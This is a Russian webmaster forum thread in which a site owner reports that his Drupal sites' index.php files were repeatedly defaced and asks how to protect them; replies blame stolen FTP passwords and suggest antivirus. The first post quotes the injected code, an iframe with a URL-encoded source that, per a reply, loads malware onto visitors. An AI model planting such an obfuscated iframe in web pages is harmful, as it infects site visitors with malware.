опять сайты взломали:(

N
На сайте с 05.01.2006
Offline
29
noe
3032

Уже во второй раз ломают сайт, меняют Index.php. В прошлый раз на главной открывался вирус. В этот раз показывается статистика посещений от вебалайзера.. Причем поломали так же два других прикрепленных домена, опять изменен индекс.пхп.

Т.е. если раньше я думал, что находили дыру в CMS drupal, то теперь я не очень понимаю как можно было взломать два других домена, через другой домен, который с ними никак не связан(разве что через хостинг)..

Не посоветуете , как можно защититься? Еще на одном из доменов вот на что поменяли главную:

<!-- ~ --><iframe src='http://%62%75%67%6F%67%6F%2E%69%6E%66%6F/%73%76/' width='1000' height='1000'></iframe><!-- ~ -->

это вообще что?? чего хотят-то от сайта?

fima32
На сайте с 12.01.2006
Offline
132
#1

У вас стырили пароли от ftp. Лечите комп от троянов и не храните пароли в IE, Total Commander, Outlook, ICQ

По возможности пользуйтесь Mozilla'ой

N
На сайте с 05.01.2006
Offline
29
noe
#2
fima32:
У вас стырили пароли от ftp. Лечите комп от троянов и не храните пароли в IE, Total Commander, Outlook, ICQ
По возможности пользуйтесь Mozilla'ой

Ну допустим стырили, зачем менять главную страницу? Лог статистики нельзя было просто скачать? Ведь я бы и не знал, что пароль стырили, если главную не менять.. причем пользы от этого ноль хакерам..

fima32
На сайте с 12.01.2006
Offline
132
#3

У каждого своя мотивация: кому-то хочется денег поиметь, а кому-то славы ☝

progress
На сайте с 11.07.2006
Offline
125
#4
fima32:
У вас стырили пароли от ftp. Лечите комп от троянов и не храните пароли в IE, Total Commander, Outlook, ICQ
По возможности пользуйтесь Mozilla'ой

Да врядли трояны, скорее всего сосед-"хакер" и спер когда приходил поиграть в игры на этом компе. Прячьте пароли надежно, иначе будете постоянно восстаналивать index.php ☝

Kislov
На сайте с 29.04.2006
Offline
185
#5
noe:
это вообще что?? чего хотят-то от сайта?

А это ифрейм с помощью которого подгружается вирус.

Поюзайте поиск. Тут были темы с кучей страниц.

И лечите комп от вирусов. Ставьте антивирь и фаервол.

N
На сайте с 05.01.2006
Offline
29
noe
#6
fima32:
У каждого своя мотивация: кому-то хочется денег поиметь, а кому-то славы ☝

спасибо за ответы, пароли пойду новые выдумывать:)

N
На сайте с 05.01.2006
Offline
29
noe
#7
progress:
Да врядли трояны, скорее всего сосед-"хакер" и спер когда приходил поиграть в игры на этом компе. Прячьте пароли надежно, иначе будете постоянно восстаналивать index.php ☝

Пароли у меня в голове, и на автозапоминании в total commander (для фтп). А за компом бывает кроме меня, разве что моя подруга. Но она в карты не играет, гороскопы тока читает, так что стырить не могла;)

K
На сайте с 31.01.2001
Offline
737
#8
noe:
А за компом бывает кроме меня, разве что моя подруга

Предохраняться надо ;)

Выделенные полосы в Москве (http://www.probkovorot.info) привели к снижению скорости до 23%.
fima32
На сайте с 12.01.2006
Offline
132
#9
noe:
спасибо за ответы, пароли пойду новые выдумывать:)

Сначала лучше антивирем троянов поубивайте, потом в Total Commander сотрите пароль на фтп, если пароли хранятся на винте в файлах, то можно положить их в запароленый архив

N
На сайте с 05.01.2006
Offline
29
noe
#10
Kislov:
А это ифрейм с помощью которого подгружается вирус.
Поюзайте поиск. Тут были темы с кучей страниц.

И лечите комп от вирусов. Ставьте антивирь и фаервол.

Т.е. если я эту страница открывал, то уже схватил вирус чтоли? У меня панда стоит уплоченная, как мне файл найти ентот, чтобы панде отправить?

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий